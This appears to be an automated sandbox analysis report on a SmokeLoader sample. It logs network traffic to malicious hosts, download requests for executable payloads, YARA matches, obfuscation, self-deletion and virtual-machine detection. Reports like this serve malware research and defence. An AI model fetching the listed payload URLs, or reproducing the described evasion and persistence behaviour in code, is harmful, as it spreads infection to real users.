Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 4b ef ae 8a 70 bc 57 dd 42 d6 f7 23 8c 21 e6 c3 93 50 2c e2 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9KpWB#!P,c0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:54:57 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeData Raw: 31 31 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 64 61 74 61 2d 68 6f 73 74 2d 63 6f 69 6e 2d 38 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 11a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at data-host-coin-8.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:55:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 37 0d 0a 02 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e d6 1e 52 25 40 a3 f5 c2 ea fb 5f f5 4d 8b 2d e4 04 08 c7 5c a5 ba 7a ae 2e 54 0a e3 f0 d8 4b fc 05 d4 43 0d 0a 30 0d 0a 0d 0a Data Ascii: 37I:82OR%@_M-\z.TKC0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:56:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d1 95 4f 11 6a 11 e9 b2 83 bd a6 02 e9 1a d1 70 ae 59 4a d9 52 a6 be 67 e3 25 58 51 b8 f6 cb 41 e1 0e 88 16 95 e1 63 da 7d b3 ef d2 01 79 e5 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OOjpYJRg%XQAc}yc0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:56:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:56:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:56:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f d4 89 4f 04 7e 02 fc a9 8d b6 e4 05 ab 0c 91 6b b9 45 4b 95 09 fd bc 67 e5 32 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 2eI:82OO~kEKg2P0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 28 Dec 2021 12:55:13 GMTContent-Type: text/htmlContent-Length: 178Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Tue, 28 Dec 2021 12:56:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 65 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c8 89 40 0e 65 1b e4 bf c1 b1 a2 14 a5 08 cd 2c b4 59 52 db 17 f8 ee 39 ec 3f 52 17 b2 ea 93 42 fe 02 86 1c 80 a7 70 9b 77 a7 f9 0d 0a 30 0d 0a 0d 0a Data Ascii: 3eI:82O@e,YR9?RBpw0
Source: unknown TCP traffic detected without corresponding DNS query: 185.186.142.166
Source: unknown TCP traffic detected without corresponding DNS query: 185.186.142.166
Source: unknown TCP traffic detected without corresponding DNS query: 185.186.142.166
Source: unknown TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown TCP traffic detected without corresponding DNS query: 185.233.81.115
Source: unknown HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dbbxvwuoso.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: host-data-coin-11.com
Source: unknown DNS traffic detected: queries for: host-data-coin-11.com
Source: global traffic HTTP traffic detected: GET /files/5376_1640094939_1074.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic HTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytools-foryou-777.com
Source: global traffic HTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected SmokeLoader
Source: Yara match File source: 00000001.00000002.733146103.0000000000540000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.781213827.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.733351124.0000000002051000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.720297741.0000000004F41000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.781100610.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: UZ6FEqlix4.exe, 00000000.00000002.674898642.000000000083A000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

barindex
Uses 32bit PE files
Source: UZ6FEqlix4.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Detected potential crypto function
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_2_00402A5F 1_2_00402A5F
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_2_00402AB3 1_2_00402AB3
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_1_00402A5F 1_1_00402A5F
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_1_00402B2E 1_1_00402B2E
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_2_00402A5F 11_2_00402A5F
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_2_00402AB3 11_2_00402AB3
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_1_00402A5F 11_1_00402A5F
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_1_00402AB3 11_1_00402AB3
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: String function: 00426940 appears 133 times
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: String function: 00428320 appears 93 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_2_00401962 Sleep,NtTerminateProcess, 1_2_00401962
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_2_0040196D Sleep,NtTerminateProcess, 1_2_0040196D
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 1_2_00402000
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose, 1_2_0040250A
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_2_00401A0B NtTerminateProcess, 1_2_00401A0B
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 1_2_0040201A
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 1_2_0040201E
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 1_2_0040202D
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_2_00402084 LocalAlloc,NtQuerySystemInformation, 1_2_00402084
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_2_00402491 NtOpenKey, 1_2_00402491
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 1_1_00402000
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose, 1_1_0040250A
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 1_1_0040201A
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 1_1_0040201E
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 1_1_0040202D
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_1_00402084 LocalAlloc,NtQuerySystemInformation, 1_1_00402084
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_1_00402491 NtOpenKey, 1_1_00402491
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_2_00401962 Sleep,NtTerminateProcess, 11_2_00401962
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_2_0040196D Sleep,NtTerminateProcess, 11_2_0040196D
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 11_2_00402000
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose, 11_2_0040250A
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_2_00401A0B NtTerminateProcess, 11_2_00401A0B
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 11_2_0040201A
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 11_2_0040201E
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 11_2_0040202D
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_2_00402084 LocalAlloc,NtQuerySystemInformation, 11_2_00402084
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_2_00402491 NtOpenKey, 11_2_00402491
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 11_1_00402000
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose, 11_1_0040250A
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 11_1_0040201A
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 11_1_0040201E
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation, 11_1_0040202D
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_1_00402084 LocalAlloc,NtQuerySystemInformation, 11_1_00402084
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_1_00402491 NtOpenKey, 11_1_00402491
PE file contains strange resources
Source: UZ6FEqlix4.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: UZ6FEqlix4.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 411F.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 411F.exe.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: eveggtb.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: eveggtb.5.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\411F.exe 8BBDDA1786E15A568A573A2F38762E95DE138AF969E0A13B96D7086AAA98BFC2
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\eveggtb 8BBDDA1786E15A568A573A2F38762E95DE138AF969E0A13B96D7086AAA98BFC2
Source: UZ6FEqlix4.exe Virustotal: Detection: 58%
Source: UZ6FEqlix4.exe Metadefender: Detection: 20%
Source: UZ6FEqlix4.exe ReversingLabs: Detection: 62%
Source: UZ6FEqlix4.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\UZ6FEqlix4.exe "C:\Users\user\Desktop\UZ6FEqlix4.exe"
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Process created: C:\Users\user\Desktop\UZ6FEqlix4.exe "C:\Users\user\Desktop\UZ6FEqlix4.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\eveggtb C:\Users\user\AppData\Roaming\eveggtb
Source: C:\Users\user\AppData\Roaming\eveggtb Process created: C:\Users\user\AppData\Roaming\eveggtb C:\Users\user\AppData\Roaming\eveggtb
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\411F.exe C:\Users\user\AppData\Local\Temp\411F.exe
Source: C:\Users\user\AppData\Local\Temp\411F.exe Process created: C:\Users\user\AppData\Local\Temp\411F.exe C:\Users\user\AppData\Local\Temp\411F.exe
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Process created: C:\Users\user\Desktop\UZ6FEqlix4.exe "C:\Users\user\Desktop\UZ6FEqlix4.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\eveggtb Process created: C:\Users\user\AppData\Roaming\eveggtb C:\Users\user\AppData\Roaming\eveggtb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\411F.exe Process created: C:\Users\user\AppData\Local\Temp\411F.exe C:\Users\user\AppData\Local\Temp\411F.exe Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\eveggtb Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@9/3@24/5
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_0041C7DF GetTickCount,FreeUserPhysicalPages,GetCalendarInfoW,GetProfileStringA,SetLastError,GetSystemWow64DirectoryA,GetWindowsDirectoryW,GetCPInfoExW,GetDiskFreeSpaceExW,GetStartupInfoA,ReadConsoleOutputCharacterA,CreateNamedPipeW,GetProcessHeap,GetProcessHeap,GetPrivateProfileIntW,SetFileAttributesA, 0_2_0041C7DF
Source: Window Recorder Window detected: More than 3 window changes detected
Source: UZ6FEqlix4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: UZ6FEqlix4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: UZ6FEqlix4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: UZ6FEqlix4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: UZ6FEqlix4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: UZ6FEqlix4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: UZ6FEqlix4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: "C:\sigut-wo.pdb source: UZ6FEqlix4.exe, eveggtb.5.dr, 411F.exe.5.dr
Source: Binary string: C:\sigut-wo.pdb source: UZ6FEqlix4.exe, eveggtb.5.dr, 411F.exe.5.dr

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_004235C8 push eax; ret 0_2_004235E6
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_008497BF push esi; ret 0_2_008497D5
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_0084975A push esi; ret 0_2_008497D5
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_2_00401880 push esi; iretd 1_2_00401893
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_2_00402E94 push es; iretd 1_2_00402EA0
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 1_1_00402E94 push es; iretd 1_1_00402EA0
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_2_00401880 push esi; iretd 11_2_00401893
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_2_00402E94 push es; iretd 11_2_00402EA0
Source: C:\Users\user\AppData\Roaming\eveggtb Code function: 11_1_00402E94 push es; iretd 11_1_00402EA0
PE file contains sections with non-standard names
Source: UZ6FEqlix4.exe Static PE information: section name: .pejevu
Source: UZ6FEqlix4.exe Static PE information: section name: .dozi
Source: 411F.exe.5.dr Static PE information: section name: .pejevu
Source: 411F.exe.5.dr Static PE information: section name: .dozi
Source: eveggtb.5.dr Static PE information: section name: .pejevu
Source: eveggtb.5.dr Static PE information: section name: .dozi
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Code function: 0_2_00433420 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_00433420
Source: initial sample Static PE information: section name: .text entropy: 6.87583252941
Source: initial sample Static PE information: section name: .text entropy: 6.87583252941
Source: initial sample Static PE information: section name: .text entropy: 6.87583252941

Persistence and Installation Behavior:

barindex
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\eveggtb Jump to dropped file
Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\eveggtb Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\411F.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Deletes itself after installation
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\uz6feqlix4.exe Jump to behavior
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\eveggtb:Zone.Identifier read attributes | delete Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: eveggtb, 0000000B.00000002.781404615.0000000001F80000.00000004.00000001.sdmp Binary or memory string: ASWHOOKZ
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\Desktop\UZ6FEqlix4.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
